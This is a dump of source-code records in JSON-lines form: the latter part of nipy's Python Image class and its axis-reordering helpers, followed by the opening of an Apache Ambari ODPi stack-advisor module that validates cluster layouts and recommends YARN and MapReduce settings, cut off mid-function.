\"\"\"The file header structure for this image, if available. This interface\n will soon go away - you should use ``img.metadata['header'] instead.\n \"\"\"\n header = property(_getheader, _setheader, doc=_doc['header'])\n\n ###################################################################\n #\n # Constructor\n #\n ###################################################################\n\n def __init__(self, data, coordmap, metadata=None):\n \"\"\"Create an `Image` object from array and `CoordinateMap` object.\n\n Images are often created through the ``load_image`` function in the nipy\n base namespace.\n\n Parameters\n ----------\n data : array-like\n object that as attribute ``shape`` and returns an array from\n ``np.asarray(data)``\n coordmap : `AffineTransform` object\n coordmap mapping the domain (input) voxel axes of the image to the\n range (reference, output) axes - usually mm in real world space\n metadata : dict, optional\n Freeform metadata for image. Most common contents is ``header``\n from nifti etc loaded images.\n\n See Also\n --------\n load_image : load ``Image`` from a file\n save_image : save ``Image`` to a file\n \"\"\"\n if metadata is None:\n metadata = {}\n else: # Shallow copy\n metadata = copy(metadata)\n ndim = len(data.shape)\n if not isinstance(coordmap, AffineTransform):\n raise ValueError('coordmap must be an AffineTransform')\n # self._data is an array-like object. 
It must have a shape attribute\n # (see above) and return an array from np.array(data)\n self._data = data\n self.coordmap = coordmap\n if coordmap.function_domain.ndim != ndim:\n raise ValueError('the number of axes implied by the coordmap do '\n 'not match the number of axes of the data')\n self.metadata = metadata\n\n ###################################################################\n #\n # Methods\n #\n ###################################################################\n\n def reordered_reference(self, order=None):\n \"\"\" Return new Image with reordered output coordinates\n\n New Image coordmap has reordered output coordinates. This does\n not transpose the data.\n\n Parameters\n ----------\n order : None, sequence, optional\n sequence of int (giving indices) or str (giving names) - expressing\n new order of coordmap output coordinates. None (the default)\n results in reversed ordering.\n\n Returns\n -------\n r_img : object\n Image of same class as `self`, with reordered output coordinates.\n\n Examples\n --------\n >>> cmap = AffineTransform.from_start_step(\n ... 'ijk', 'xyz', [1, 2, 3], [4, 5, 6], 'domain', 'range')\n >>> im = Image(np.empty((30,40,50)), cmap)\n >>> im_reordered = im.reordered_reference([2,0,1])\n >>> im_reordered.shape\n (30, 40, 50)\n >>> im_reordered.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('i', 'j', 'k'), name='domain', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('z', 'x', 'y'), name='range', coord_dtype=float64),\n affine=array([[ 0., 0., 6., 3.],\n [ 4., 0., 0., 1.],\n [ 0., 5., 0., 2.],\n [ 0., 0., 0., 1.]])\n )\n \"\"\"\n if order is None:\n order = range(self.ndim)[::-1]\n elif type(order[0]) == type(''):\n order = [self.reference.index(s) for s in order]\n new_cmap = self.coordmap.reordered_range(order)\n return self.__class__.from_image(self, coordmap=new_cmap)\n\n def reordered_axes(self, order=None):\n \"\"\" Return a new Image with reordered input coordinates.\n\n This transposes the data as well.\n\n Parameters\n ----------\n order : None, sequence, optional\n Sequence of int (giving indices) or str (giving names) - expressing\n new order of coordmap output coordinates. None (the default)\n results in reversed ordering.\n\n Returns\n -------\n r_img : object\n Image of same class as `self`, with reordered output coordinates.\n\n Examples\n --------\n >>> cmap = AffineTransform.from_start_step(\n ... 
'ijk', 'xyz', [1, 2, 3], [4, 5, 6], 'domain', 'range')\n >>> cmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('i', 'j', 'k'), name='domain', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('x', 'y', 'z'), name='range', coord_dtype=float64),\n affine=array([[ 4., 0., 0., 1.],\n [ 0., 5., 0., 2.],\n [ 0., 0., 6., 3.],\n [ 0., 0., 0., 1.]])\n )\n >>> im = Image(np.empty((30,40,50)), cmap)\n >>> im_reordered = im.reordered_axes([2,0,1])\n >>> im_reordered.shape\n (50, 30, 40)\n >>> im_reordered.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('k', 'i', 'j'), name='domain', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('x', 'y', 'z'), name='range', coord_dtype=float64),\n affine=array([[ 0., 4., 0., 1.],\n [ 0., 0., 5., 2.],\n [ 6., 0., 0., 3.],\n [ 0., 0., 0., 1.]])\n )\n \"\"\"\n if order is None:\n order = range(self.ndim)[::-1]\n elif type(order[0]) == type(''):\n order = [self.axes.index(s) for s in order]\n new_cmap = self.coordmap.reordered_domain(order)\n # Only transpose if we have to so as to avoid calling\n # self.get_data\n if order != range(self.ndim):\n new_data = np.transpose(self.get_data(), order)\n else:\n new_data = self._data\n return self.__class__.from_image(self,\n data=new_data,\n coordmap=new_cmap)\n\n def renamed_axes(self, **names_dict):\n \"\"\" Return a new image with input (domain) axes renamed\n\n Axes renamed according to the input dictionary.\n\n Parameters\n ----------\n \\*\\*names_dict : dict\n with keys being old names, and values being new names\n\n Returns\n -------\n newimg : Image\n An Image with the same data, having its axes renamed.\n\n Examples\n --------\n >>> data = np.random.standard_normal((11,9,4))\n >>> im = Image(data, AffineTransform.from_params('ijk', 'xyz', np.identity(4), 'domain', 'range'))\n >>> im_renamed = im.renamed_axes(i='slice')\n >>> print im_renamed.axes\n CoordinateSystem(coord_names=('slice', 'j', 'k'), name='domain', coord_dtype=float64)\n \"\"\"\n new_cmap = self.coordmap.renamed_domain(names_dict)\n return self.__class__.from_image(self, coordmap=new_cmap)\n\n def renamed_reference(self, **names_dict):\n \"\"\" Return new image with renamed output (range) coordinates\n\n Coordinates renamed according to the dictionary\n\n Parameters\n ----------\n \\*\\*names_dict : dict\n with keys being old names, and values being new names\n\n Returns\n -------\n newimg : Image\n An Image with the same data, having its output coordinates renamed.\n\n Examples\n --------\n >>> data = np.random.standard_normal((11,9,4))\n >>> im = Image(data, AffineTransform.from_params('ijk', 'xyz', np.identity(4), 'domain', 'range'))\n >>> im_renamed_reference = im.renamed_reference(x='newx', y='newy')\n >>> print im_renamed_reference.reference\n CoordinateSystem(coord_names=('newx', 'newy', 'z'), name='range', coord_dtype=float64)\n \"\"\"\n new_cmap = self.coordmap.renamed_range(names_dict)\n return self.__class__.from_image(self, coordmap=new_cmap)\n\n def __setitem__(self, index, value):\n \"\"\"Setting values of an image, set values in the data array.\"\"\"\n warnings.warn(\"Please don't use ``img[x] = y``; use \"\n \"``img.get_data()[x] = y`` instead\",\n DeprecationWarning,\n stacklevel=2)\n self._data[index] = value\n\n def __array__(self):\n \"\"\"Return data as a numpy array.\"\"\"\n warnings.warn('Please use get_data instead - will be deprecated',\n DeprecationWarning,\n stacklevel=2)\n return self.get_data()\n\n def get_data(self):\n \"\"\"Return data 
as a numpy array.\"\"\"\n return np.asanyarray(self._data)\n\n def __getitem__(self, slice_object):\n \"\"\" Slicing an image returns an Image.\n\n Parameters\n ----------\n slice_object: int, slice or sequence of slice\n An object representing a numpy 'slice'.\n\n Returns\n -------\n img_subsampled: Image\n An Image with data self.get_data()[slice_object] and an\n appropriately corrected CoordinateMap.\n\n Examples\n --------\n >>> from nipy.io.api import load_image\n >>> from nipy.testing import funcfile\n >>> im = load_image(funcfile)\n >>> frame3 = im[:,:,:,3]\n >>> np.allclose(frame3.get_data(), im.get_data()[:,:,:,3])\n True\n \"\"\"\n data = self.get_data()[slice_object]\n g = ArrayCoordMap(self.coordmap, self.shape)[slice_object]\n coordmap = g.coordmap\n if coordmap.function_domain.ndim > 0:\n return self.__class__.from_image(self,\n data=data,\n coordmap=coordmap)\n else:\n return data\n\n def __iter__(self):\n \"\"\" Images do not have default iteration\n\n This is because it's not obvious that axis 0 is the right axis to\n iterate over. For example, we often want to iterate over the time or\n volume axis, and this is more likely to be axis 3\n \"\"\"\n raise TypeError(\"Images do not have default iteration; \"\n \"you can use ``iter_axis(img, axis)`` instead.\")\n\n def __eq__(self, other):\n return (isinstance(other, self.__class__)\n and np.all(self.get_data() == other.get_data())\n and np.all(self.affine == other.affine)\n and (self.axes.coord_names == other.axes.coord_names))\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __repr__(self):\n options = np.get_printoptions()\n np.set_printoptions(precision=6, threshold=64, edgeitems=2)\n representation = \\\n 'Image(\\n data=%s,\\n coordmap=%s)' % (\n '\\n '.join(repr(self._data).split('\\n')),\n '\\n '.join(repr(self.coordmap).split('\\n')))\n np.set_printoptions(**options)\n return representation\n\n @classmethod\n def from_image(klass, img, data=None, coordmap=None, metadata=None):\n \"\"\" Classmethod makes new instance of this `klass` from instance `img`\n\n Parameters\n ----------\n data : array-like\n object that as attribute ``shape`` and returns an array from\n ``np.asarray(data)``\n coordmap : `AffineTransform` object\n coordmap mapping the domain (input) voxel axes of the image to the\n range (reference, output) axes - usually mm in real world space\n metadata : dict, optional\n Freeform metadata for image. 
Most common contents is ``header``\n from nifti etc loaded images.\n\n Returns\n -------\n img : `klass` instance\n New image with data from `data`, coordmap from `coordmap` maybe\n metadata from `metadata`\n\n Notes\n -----\n Subclasses of ``Image`` with different semantics for ``__init__`` will\n need to override this classmethod.\n\n Examples\n --------\n >>> from nipy import load_image\n >>> from nipy.core.api import Image\n >>> from nipy.testing import anatfile\n >>> aimg = load_image(anatfile)\n >>> arr = np.arange(24).reshape((2,3,4))\n >>> img = Image.from_image(aimg, data=arr)\n \"\"\"\n if data is None:\n data = img._data\n if coordmap is None:\n coordmap = copy(img.coordmap)\n if metadata is None:\n metadata = copy(img.metadata)\n return klass(data, coordmap, metadata)\n\n\nclass SliceMaker(object):\n \"\"\" This class just creates slice objects for image resampling\n\n It only has a __getitem__ method that returns its argument.\n\n XXX Wouldn't need this if there was a way\n XXX to do this\n XXX subsample(img, [::2,::3,10:1:-1])\n XXX\n XXX Could be something like this Subsample(img)[::2,::3,10:1:-1]\n \"\"\"\n def __getitem__(self, index):\n return index\n\nslice_maker = SliceMaker()\n\n\ndef subsample(img, slice_object):\n \"\"\" Subsample an image\n\n Please don't use this function, but use direct image slicing instead. That\n is, replace::\n\n frame3 = subsample(im, slice_maker[:,:,:,3])\n\n with::\n\n frame3 = im[:,:,:,3]\n\n Parameters\n ----------\n img : Image\n slice_object: int, slice or sequence of slice\n An object representing a numpy 'slice'.\n\n Returns\n -------\n img_subsampled: Image\n An Image with data img.get_data()[slice_object] and an appropriately\n corrected CoordinateMap.\n\n Examples\n --------\n >>> from nipy.io.api import load_image\n >>> from nipy.testing import funcfile\n >>> from nipy.core.api import subsample, slice_maker\n >>> im = load_image(funcfile)\n >>> frame3 = subsample(im, slice_maker[:,:,:,3])\n >>> np.allclose(frame3.get_data(), im.get_data()[:,:,:,3])\n True\n \"\"\"\n warnings.warn('subsample is deprecated, please use image '\n 'slicing instead (e.g. 
img[:,:,1]',\n DeprecationWarning,\n stacklevel=2)\n return img.__getitem__(slice_object)\n\n\ndef fromarray(data, innames, outnames):\n \"\"\"Create an image from array `data`, and input/output coordinate names\n\n The mapping between the input and output coordinate names is the identity\n matrix.\n\n Please don't use this routine, but instead prefer::\n\n from nipy.core.api import Image, AffineTransform\n img = Image(data, AffineTransform(innames, outnames, np.eye(4)))\n\n where ``4`` is ``len(innames) + 1``.\n\n Parameters\n ----------\n data : numpy array\n A numpy array of three dimensions.\n innames : sequence\n a list of input axis names\n innames : sequence\n a list of output axis names\n\n Returns\n -------\n image : An `Image` object\n\n See Also\n --------\n load : function for loading images\n save : function for saving images\n\n Examples\n --------\n >>> img = fromarray(np.zeros((2,3,4)), 'ijk', 'xyz')\n >>> img.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('i', 'j', 'k'), name='', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('x', 'y', 'z'), name='', coord_dtype=float64),\n affine=array([[ 1., 0., 0., 0.],\n [ 0., 1., 0., 0.],\n [ 0., 0., 1., 0.],\n [ 0., 0., 0., 1.]])\n )\n \"\"\"\n warnings.warn('fromarray is deprecated, please use the Image '\n 'constructor instead',\n DeprecationWarning,\n stacklevel=2)\n ndim = len(data.shape)\n coordmap = AffineTransform.from_start_step(innames,\n outnames,\n (0.,)*ndim,\n (1.,)*ndim)\n return Image(data, coordmap)\n\n\n@np.deprecate_with_doc('Please use rollimg instead')\ndef rollaxis(img, axis, inverse=False):\n \"\"\" Roll `axis` backwards, until it lies in the first position.\n\n It also reorders the reference coordinates by the same ordering.\n This is done to preserve a diagonal affine matrix if image.affine\n is diagonal. It also makes it possible to unambiguously specify\n an axis to roll along in terms of either a reference name (i.e. 'z')\n or an axis name (i.e. 'slice').\n\n This function is deprecated; please use ``rollimg`` instead.\n\n Parameters\n ----------\n img : Image\n Image whose axes and reference coordinates are to be reordered\n by rolling.\n axis : str or int\n Axis to be rolled, can be specified by name or as an integer.\n inverse : bool, optional\n If inverse is True, then axis must be an integer and the first axis is\n returned to the position axis. 
This keyword is deprecated and we'll\n remove it in a future version of nipy.\n\n Returns\n -------\n newimg : Image\n Image with reordered axes and reference coordinates.\n\n Examples\n --------\n >>> data = np.zeros((30,40,50,5))\n >>> affine_transform = AffineTransform.from_params('ijkl', 'xyzt', np.diag([1,2,3,4,1]))\n >>> im = Image(data, affine_transform)\n >>> im.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('i', 'j', 'k', 'l'), name='', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('x', 'y', 'z', 't'), name='', coord_dtype=float64),\n affine=array([[ 1., 0., 0., 0., 0.],\n [ 0., 2., 0., 0., 0.],\n [ 0., 0., 3., 0., 0.],\n [ 0., 0., 0., 4., 0.],\n [ 0., 0., 0., 0., 1.]])\n )\n >>> im_t_first = rollaxis(im, 't')\n >>> np.diag(im_t_first.affine)\n array([ 4., 1., 2., 3., 1.])\n >>> im_t_first.shape\n (5, 30, 40, 50)\n >>> im_t_first.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('l', 'i', 'j', 'k'), name='', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('t', 'x', 'y', 'z'), name='', coord_dtype=float64),\n affine=array([[ 4., 0., 0., 0., 0.],\n [ 0., 1., 0., 0., 0.],\n [ 0., 0., 2., 0., 0.],\n [ 0., 0., 0., 3., 0.],\n [ 0., 0., 0., 0., 1.]])\n )\n \"\"\"\n if inverse not in (True, False):\n raise ValueError('Inverse should be True or False; did you mean to '\n 'use the ``rollimg` function instead?')\n if isinstance(axis, int) and axis < 0:\n axis = img.ndim + axis\n if inverse:\n if type(axis) != type(0):\n raise ValueError('If carrying out inverse rolling, '\n 'axis must be an integer')\n order = range(1, img.ndim)\n order.insert(axis, 0)\n return img.reordered_axes(order).reordered_reference(order)\n if axis not in (range(img.axes.ndim) +\n list(img.axes.coord_names) +\n list(img.reference.coord_names)):\n raise ValueError('axis must be an axis number,'\n 'an axis name or a reference name')\n # Find out which index axis corresonds to\n in_index = out_index = -1\n if type(axis) == type(''):\n try:\n in_index = img.axes.index(axis)\n except:\n pass\n try:\n out_index = img.reference.index(axis)\n except:\n pass\n if in_index > 0 and out_index > 0 and in_index != out_index:\n raise ValueError('ambiguous choice of axis -- it exists '\n 'both in as an axis name and a '\n 'reference name')\n if in_index >= 0:\n axis = in_index\n else:\n axis = out_index\n if axis == -1:\n axis += img.axes.ndim\n order = range(img.ndim)\n order.remove(axis)\n order.insert(0, axis)\n return img.reordered_axes(order).reordered_reference(order)\n\n\ndef rollimg(img, axis, start=0, fix0=True):\n \"\"\" Roll `axis` backwards in the inputs, until it lies before `start`\n\n Parameters\n ----------\n img : Image\n Image whose axes and reference coordinates are to be reordered by\n rollimg.\n axis : str or int\n Axis to be rolled, can be specified by name or as an integer. If an\n integer, axis is an input axis. If a name, can be name of input or\n output axis. If an output axis, we search for the closest matching\n input axis, and raise an AxisError if this fails.\n start : str or int, optional\n position before which to roll axis `axis`. Default to 0. Can again be\n an integer (input axis) or name of input or output axis.\n fix0 : bool, optional\n Whether to allow for zero scaling when searching for an input axis\n matching an output axis. 
Useful for images where time scaling is 0.\n\n Returns\n -------\n newimg : Image\n Image with reordered input axes and corresponding data.\n\n Examples\n --------\n >>> data = np.zeros((30,40,50,5))\n >>> affine_transform = AffineTransform('ijkl', 'xyzt', np.diag([1,2,3,4,1]))\n >>> im = Image(data, affine_transform)\n >>> im.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('i', 'j', 'k', 'l'), name='', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('x', 'y', 'z', 't'), name='', coord_dtype=float64),\n affine=array([[ 1., 0., 0., 0., 0.],\n [ 0., 2., 0., 0., 0.],\n [ 0., 0., 3., 0., 0.],\n [ 0., 0., 0., 4., 0.],\n [ 0., 0., 0., 0., 1.]])\n )\n >>> im_t_first = rollimg(im, 't')\n >>> im_t_first.shape\n (5, 30, 40, 50)\n >>> im_t_first.coordmap\n AffineTransform(\n function_domain=CoordinateSystem(coord_names=('l', 'i', 'j', 'k'), name='', coord_dtype=float64),\n function_range=CoordinateSystem(coord_names=('x', 'y', 'z', 't'), name='', coord_dtype=float64),\n affine=array([[ 0., 1., 0., 0., 0.],\n [ 0., 0., 2., 0., 0.],\n [ 0., 0., 0., 3., 0.],\n [ 4., 0., 0., 0., 0.],\n [ 0., 0., 0., 0., 1.]])\n )\n \"\"\"\n axis = input_axis_index(img.coordmap, axis, fix0)\n start = input_axis_index(img.coordmap, start, fix0)\n order = range(img.ndim)\n order.remove(axis)\n if axis < start:\n start -= 1\n order.insert(start, axis)\n return img.reordered_axes(order)\n\n\ndef iter_axis(img, axis, asarray=False):\n \"\"\" Return generator to slice an image `img` over `axis`\n\n Parameters\n ----------\n img : ``Image`` instance\n axis : int or str\n axis identifier, either name or axis number\n asarray : {False, True}, optional\n\n Returns\n -------\n g : generator\n such that list(g) returns a list of slices over `axis`. If `asarray` is\n `False` the slices are images. 
If `asarray` is True, slices are the\n data from the images.\n\n Examples\n --------\n >>> data = np.arange(24).reshape((4,3,2))\n >>> img = Image(data, AffineTransform('ijk', 'xyz', np.eye(4)))\n >>> slices = list(iter_axis(img, 'j'))\n >>> len(slices)\n 3\n >>> slices[0].shape\n (4, 2)\n >>> slices = list(iter_axis(img, 'k', asarray=True))\n >>> slices[1].sum() == data[:,:,1].sum()\n True\n \"\"\"\n rimg = rollimg(img, axis)\n for i in range(rimg.shape[0]):\n if asarray:\n yield rimg[i].get_data()\n else:\n yield rimg[i]\n\n\ndef synchronized_order(img, target_img,\n axes=True,\n reference=True):\n \"\"\" Reorder reference and axes of `img` to match target_img.\n\n Parameters\n ----------\n img : Image\n target_img : Image\n axes : bool, optional\n If True, synchronize the order of the axes.\n reference : bool, optional\n If True, synchronize the order of the reference coordinates.\n\n Returns\n -------\n newimg : Image\n An Image satisfying newimg.axes == target.axes (if axes == True),\n newimg.reference == target.reference (if reference == True).\n\n Examples\n --------\n >>> data = np.random.standard_normal((3,4,7,5))\n >>> im = Image(data, AffineTransform.from_params('ijkl', 'xyzt', np.diag([1,2,3,4,1])))\n >>> im_scrambled = im.reordered_axes('iljk').reordered_reference('txyz')\n >>> im == im_scrambled\n False\n >>> im_unscrambled = synchronized_order(im_scrambled, im)\n >>> im == im_unscrambled\n True\n\n The images don't have to be the same shape\n\n >>> data2 = np.random.standard_normal((3,11,9,4))\n >>> im2 = Image(data, AffineTransform.from_params('ijkl', 'xyzt', np.diag([1,2,3,4,1])))\n >>> im_scrambled2 = im2.reordered_axes('iljk').reordered_reference('xtyz')\n >>> im_unscrambled2 = synchronized_order(im_scrambled2, im)\n >>> im_unscrambled2.coordmap == im.coordmap\n True\n\n or have the same coordmap\n\n >>> data3 = np.random.standard_normal((3,11,9,4))\n >>> im3 = Image(data3, AffineTransform.from_params('ijkl', 'xyzt', np.diag([1,9,3,-2,1])))\n >>> im_scrambled3 = im3.reordered_axes('iljk').reordered_reference('xtyz')\n >>> im_unscrambled3 = synchronized_order(im_scrambled3, im)\n >>> im_unscrambled3.axes == im.axes\n True\n >>> im_unscrambled3.reference == im.reference\n True\n >>> im_unscrambled4 = synchronized_order(im_scrambled3, im, axes=False)\n >>> im_unscrambled4.axes == im.axes\n False\n >>> im_unscrambled4.axes == im_scrambled3.axes\n True\n >>> im_unscrambled4.reference == im.reference\n True\n \"\"\"\n # Caution, we can't just use target_img.reference because other subclasses\n # of Image may not have all axes in the .reference attribute.\n target_axes = target_img.axes # = target_img.coordmap.function_domain\n # the below not necessarily == target_image.reference\n target_reference = target_img.coordmap.function_range\n if axes:\n img = img.reordered_axes(target_axes.coord_names)\n if reference:\n img = img.reordered_reference(target_reference.coord_names)\n return img\n\n\ndef is_image(obj):\n ''' Returns true if this object obeys the Image API\n\n This allows us to test for something that is duck-typing an image.\n\n For now an array must have a 'coordmap' attribute, and a callable\n 'get_data' attribute.\n\n Parameters\n ----------\n obj : object\n object for which to test API\n\n Returns\n -------\n is_img : bool\n True if object obeys image API\n\n Examples\n --------\n >>> from nipy.testing import anatfile\n >>> from nipy.io.api import load_image\n >>> img = load_image(anatfile)\n >>> is_image(img)\n True\n >>> class C(object): pass\n >>> c = C()\n >>> 
is_image(c)\n False\n '''\n if not hasattr(obj, 'coordmap') or not hasattr(obj, 'metadata'):\n return False\n return callable(getattr(obj, 'get_data'))\n"} {"ext": "py", "sha": "1a2fa0d94235cb305d4326941f062b6b4474b851", "content": "#!/usr/bin/env ambari-python-wrap\n\"\"\"\nLicensed to the Apache Software Foundation (ASF) under one\nor more contributor license agreements. See the NOTICE file\ndistributed with this work for additional information\nregarding copyright ownership. The ASF licenses this file\nto you under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport re\nimport os\nimport sys\nimport socket\n\nfrom math import ceil, floor\n\nfrom resource_management.core.logger import Logger\nfrom resource_management.libraries.functions.mounted_dirs_helper import get_mounts_with_multiple_data_dirs\n\nfrom stack_advisor import DefaultStackAdvisor\n\n\nclass ODPi20StackAdvisor(DefaultStackAdvisor):\n\n def __init__(self):\n super(ODPi20StackAdvisor, self).__init__()\n Logger.initialize_logger()\n\n def getComponentLayoutValidations(self, services, hosts):\n \"\"\"Returns array of Validation objects about issues with hostnames components assigned to\"\"\"\n items = super(ODPi20StackAdvisor, self).getComponentLayoutValidations(services, hosts)\n\n # Validating NAMENODE and SECONDARY_NAMENODE are on different hosts if possible\n # Use a set for fast lookup\n hostsSet = set(super(ODPi20StackAdvisor, self).getActiveHosts([host[\"Hosts\"] for host in hosts[\"items\"]])) #[host[\"Hosts\"][\"host_name\"] for host in hosts[\"items\"]]\n hostsCount = len(hostsSet)\n\n componentsListList = [service[\"components\"] for service in services[\"services\"]]\n componentsList = [item for sublist in componentsListList for item in sublist]\n nameNodeHosts = [component[\"StackServiceComponents\"][\"hostnames\"] for component in componentsList if component[\"StackServiceComponents\"][\"component_name\"] == \"NAMENODE\"]\n secondaryNameNodeHosts = [component[\"StackServiceComponents\"][\"hostnames\"] for component in componentsList if component[\"StackServiceComponents\"][\"component_name\"] == \"SECONDARY_NAMENODE\"]\n\n # Validating cardinality\n for component in componentsList:\n if component[\"StackServiceComponents\"][\"cardinality\"] is not None:\n componentName = component[\"StackServiceComponents\"][\"component_name\"]\n componentDisplayName = component[\"StackServiceComponents\"][\"display_name\"]\n componentHosts = []\n if component[\"StackServiceComponents\"][\"hostnames\"] is not None:\n componentHosts = [componentHost for componentHost in component[\"StackServiceComponents\"][\"hostnames\"] if componentHost in hostsSet]\n componentHostsCount = len(componentHosts)\n cardinality = str(component[\"StackServiceComponents\"][\"cardinality\"])\n # cardinality types: null, 1+, 1-2, 1, ALL\n message = None\n if \"+\" in cardinality:\n hostsMin = int(cardinality[:-1])\n if componentHostsCount < hostsMin:\n message = \"At least {0} {1} components should be installed in cluster.\".format(hostsMin, componentDisplayName)\n elif \"-\" 
in cardinality:\n nums = cardinality.split(\"-\")\n hostsMin = int(nums[0])\n hostsMax = int(nums[1])\n if componentHostsCount > hostsMax or componentHostsCount < hostsMin:\n message = \"Between {0} and {1} {2} components should be installed in cluster.\".format(hostsMin, hostsMax, componentDisplayName)\n elif \"ALL\" == cardinality:\n if componentHostsCount != hostsCount:\n message = \"{0} component should be installed on all hosts in cluster.\".format(componentDisplayName)\n else:\n if componentHostsCount != int(cardinality):\n message = \"Exactly {0} {1} components should be installed in cluster.\".format(int(cardinality), componentDisplayName)\n\n if message is not None:\n items.append({\"type\": 'host-component', \"level\": 'ERROR', \"message\": message, \"component-name\": componentName})\n\n # Validating host-usage\n usedHostsListList = [component[\"StackServiceComponents\"][\"hostnames\"] for component in componentsList if not self.isComponentNotValuable(component)]\n usedHostsList = [item for sublist in usedHostsListList for item in sublist]\n nonUsedHostsList = [item for item in hostsSet if item not in usedHostsList]\n for host in nonUsedHostsList:\n items.append( { \"type\": 'host-component', \"level\": 'ERROR', \"message\": 'Host is not used', \"host\": str(host) } )\n\n return items\n\n def getServiceConfigurationRecommenderDict(self):\n return {\n \"YARN\": self.recommendYARNConfigurations,\n \"MAPREDUCE2\": self.recommendMapReduce2Configurations,\n \"HDFS\": self.recommendHDFSConfigurations,\n \"HBASE\": self.recommendHbaseConfigurations,\n \"STORM\": self.recommendStormConfigurations,\n \"AMBARI_METRICS\": self.recommendAmsConfigurations,\n \"RANGER\": self.recommendRangerConfigurations\n }\n\n def recommendYARNConfigurations(self, configurations, clusterData, services, hosts):\n putYarnProperty = self.putProperty(configurations, \"yarn-site\", services)\n putYarnPropertyAttribute = self.putPropertyAttribute(configurations, \"yarn-site\")\n putYarnEnvProperty = self.putProperty(configurations, \"yarn-env\", services)\n nodemanagerMinRam = 1048576 # 1TB in mb\n if \"referenceNodeManagerHost\" in clusterData:\n nodemanagerMinRam = min(clusterData[\"referenceNodeManagerHost\"][\"total_mem\"]/1024, nodemanagerMinRam)\n putYarnProperty('yarn.nodemanager.resource.memory-mb', int(round(min(clusterData['containers'] * clusterData['ramPerContainer'], nodemanagerMinRam))))\n putYarnProperty('yarn.scheduler.minimum-allocation-mb', int(clusterData['ramPerContainer']))\n putYarnProperty('yarn.scheduler.maximum-allocation-mb', int(configurations[\"yarn-site\"][\"properties\"][\"yarn.nodemanager.resource.memory-mb\"]))\n putYarnEnvProperty('min_user_id', self.get_system_min_uid())\n\n sc_queue_name = self.recommendYarnQueue(services, \"yarn-env\", \"service_check.queue.name\")\n if sc_queue_name is not None:\n putYarnEnvProperty(\"service_check.queue.name\", sc_queue_name)\n\n containerExecutorGroup = 'hadoop'\n if 'cluster-env' in services['configurations'] and 'user_group' in services['configurations']['cluster-env']['properties']:\n containerExecutorGroup = services['configurations']['cluster-env']['properties']['user_group']\n putYarnProperty(\"yarn.nodemanager.linux-container-executor.group\", containerExecutorGroup)\n\n servicesList = [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]\n if \"TEZ\" in servicesList:\n ambari_user = self.getAmbariUser(services)\n ambariHostName = socket.getfqdn()\n 
putYarnProperty(\"yarn.timeline-service.http-authentication.proxyuser.{0}.hosts\".format(ambari_user), ambariHostName)\n putYarnProperty(\"yarn.timeline-service.http-authentication.proxyuser.{0}.groups\".format(ambari_user), \"*\")\n old_ambari_user = self.getOldAmbariUser(services)\n if old_ambari_user is not None:\n putYarnPropertyAttribute(\"yarn.timeline-service.http-authentication.proxyuser.{0}.hosts\".format(old_ambari_user), 'delete', 'true')\n putYarnPropertyAttribute(\"yarn.timeline-service.http-authentication.proxyuser.{0}.groups\".format(old_ambari_user), 'delete', 'true')\n\n\n def recommendMapReduce2Configurations(self, configurations, clusterData, services, hosts):\n putMapredProperty = self.putProperty(configurations, \"mapred-site\", services)\n putMapredProperty('yarn.app.mapreduce.am.resource.mb', int(clusterData['amMemory']))\n putMapredProperty('yarn.app.mapreduce.am.command-opts', \"-Xmx\" + str(int(round(0.8 * clusterData['amMemory']))) + \"m\")\n putMapredProperty('mapreduce.map.memory.mb', clusterData['mapMemory'])\n putMapredProperty('mapreduce.reduce.memory.mb', int(clusterData['reduceMemory']))\n putMapredProperty('mapreduce.map.java.opts', \"-Xmx\" + str(int(round(0.8 * clusterData['mapMemory']))) + \"m\")\n putMapredProperty('mapreduce.reduce.java.opts', \"-Xmx\" + str(int(round(0.8 * clusterData['reduceMemory']))) + \"m\")\n putMapredProperty('mapreduce.task.io.sort.mb', min(int(round(0.4 * clusterData['mapMemory'])), 1024))\n mr_queue = self.recommendYarnQueue(services, \"mapred-site\", \"mapreduce.job.queuename\")\n if mr_queue is not None:\n putMapredProperty(\"mapreduce.job.queuename\", mr_queue)\n\n def getAmbariUser(self, services):\n ambari_user = services['ambari-server-properties']['ambari-server.user']\n if \"cluster-env\" in services[\"configurations\"] \\\n and \"ambari_principal_name\" in services[\"configurations\"][\"cluster-env\"][\"properties\"] \\\n and \"security_enabled\" in services[\"configurations\"][\"cluster-env\"][\"properties\"] \\\n and services[\"configurations\"][\"cluster-env\"][\"properties\"][\"security_enabled\"].lower() == \"true\":\n ambari_user = services[\"configurations\"][\"cluster-env\"][\"properties\"][\"ambari_principal_name\"]\n ambari_user = ambari_user.split('@')[0]\n return ambari_user\n\n def getOldAmbariUser(self, services):\n ambari_user = None\n if \"cluster-env\" in services[\"configurations\"]:\n if \"security_enabled\" in services[\"configurations\"][\"cluster-env\"][\"properties\"] \\\n and services[\"configurations\"][\"cluster-env\"][\"properties\"][\"security_enabled\"].lower() == \"true\":\n ambari_user = services['ambari-server-properties']['ambari-server.user']\n elif \"ambari_principal_name\" in services[\"configurations\"][\"cluster-env\"][\"properties\"]:\n ambari_user = services[\"configurations\"][\"cluster-env\"][\"properties\"][\"ambari_principal_name\"]\n ambari_user = ambari_user.split('@')[0]\n return ambari_user\n\n def recommendAmbariProxyUsersForHDFS(self, services, servicesList, putCoreSiteProperty, 